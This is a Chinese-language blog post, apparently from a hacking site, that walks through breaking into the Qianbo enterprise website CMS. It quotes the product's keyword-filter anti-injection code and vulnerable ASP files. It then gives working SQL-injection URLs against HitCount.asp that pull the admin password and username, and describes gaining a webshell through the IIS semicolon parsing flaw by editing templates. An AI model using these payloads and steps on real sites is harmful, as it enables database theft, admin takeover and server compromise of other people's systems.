程序都加入了防注入代码的,在NoSql.asp文件中7kccopyd-code

<%

If EnableStopInjection = True Then

Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr

Fy_In = "’|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"

Fy_Inf = Split(Fy_In, "|")

If Request.Form<>"" Then

For Each Fy_Post In Request.Form

For Fy_Xh = 0 To UBound(Fy_Inf)

If InStr(LCase(Request.Form(Fy_Post)), Fy_Inf(Fy_Xh))<>0 Then

Response.Write "<Script Language=’JavaScript’>alert(’警告:参数非法!’);</Script>"

Response.End

End If

Next

Next

End If

If Request.QueryString<>"" Then

For Each Fy_Get In Request.QueryString

For Fy_Xh = 0 To UBound(Fy_Inf)

If InStr(LCase(Request.QueryString(Fy_Get)), Fy_Inf(Fy_Xh))<>0 Then

Response.Write "<Script Language=’JavaScript’>alert(’警告:参数非法!’);</Script>"

Response.End

Response.End

End If

Next

Next

End If

End If

%>

没有过滤cookie,不过程序在对变量传入时都限制了整型的,所以我也没办法。

继续看。

MemberLogin.Asp这个文件

Dim LoginName, LoginPassword, VerifyCode, MemName, Password, GroupID, GroupName, Working, rs, sql

LoginName = Trim(request.Form("LoginName"))

LoginPassword = Md5(request.Form("LoginPassword"))

Set rs = server.CreateObject("adodb.recordset")

sql = "select * from Qianbo_Members where MemName=’"&LoginName&"’"

没有加入防注入代码,不过却是登录验证页面,如果是MSsql数据库我们还好办点。

这个时候,在HitCount.Asp这个文件里发现,文件没有调用防注入代码

<%

Dim rs, m_SQL

Dim m_ID

m_ID = ReplaceBadChar(Request.QueryString("id"))

m_LX = ReplaceBadChar(Request.QueryString("LX"))

action = ReplaceBadChar(Request.QueryString("action"))

If action = "count" Then

conn.Execute("update "&m_LX&" set ClickNumber = ClickNumber + 1 where ID=" & m_ID & "")

Else

m_SQL = "select ClickNumber from "&m_LX&" where ID=" & m_ID

Set rs = conn.Execute(m_SQL)

response.Write "document.write("&rs(0)&");"

rs.Close

Set rs = Nothing

End If

%>

就是这个文件了。我们来构造注入语句

如下:

获取管理密码:

https://www.webshell.cc/hitcount.asp?lx=Qianbo_about&id=1%20and%201=2%20union%20select%20password%20from%20qianbo_admin

 

获取管理帐号:

https://www.webshell.cc/hitcount.asp?lx=Qianbo_about&id=1%20and%201=2%20union%20select%20adminname%20from%20qianbo_admin

找后台就访问https://www.webshell.cc/sitemap.xml吧!

拿SHELL:

IIS的asp;分号解析漏洞还是害了不少人,千博企业网站管理系统.后台拿SHELL依旧是修改模板*.asp;*生成。

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/3508.html